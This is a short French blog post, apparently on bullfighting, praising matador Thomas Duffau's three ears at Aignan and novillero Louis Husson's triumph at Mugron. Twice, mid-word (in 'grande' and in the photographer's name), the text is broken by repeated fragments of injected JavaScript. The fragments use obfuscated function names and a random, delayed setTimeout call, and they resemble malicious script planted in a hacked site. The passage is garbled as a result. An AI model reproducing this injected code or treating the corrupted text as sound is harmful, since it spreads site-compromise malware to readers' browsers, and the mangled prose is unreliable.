UN COCORICO DANS LE SUD OUEST

Le dernier week-end pascal a été une réussite pour les toreros du cru. A Aignan, Thomas Duffau, dont il ne faut pas oublier que c’est un matador à l’alternative récente, a déjoué les pronostics en coupant  trois oreilles à un lot de Valdefresno devant des toreros de plus grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande notoriété que lui comme David Mora ou Juan del Alamo.

Thomas construit son chemin petit à petit avec des visites plus ponctuelles en Espagne, et à la manière d’un Castella il se forge sur ses terres.

Le novillero Louis Husson, originaire de Dax, se présentait en piquée à Mugron et lui aussi est sorti triomphateur devant des novilleros dont on a beaucoup parlé dernièrement comme José Garrido et Ginés Marín. C’est un garçon avec une forte personnalité dans l’arène et beaucoup de goût aussi bien à la cape qu’à la muleta et il a prouvé par ailleurs être fort habile l’épée en main.

photos Lionel Bon et Bertrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Caritey

[simpleviewer gallery_id="16"]

Les commentaires sont fermés.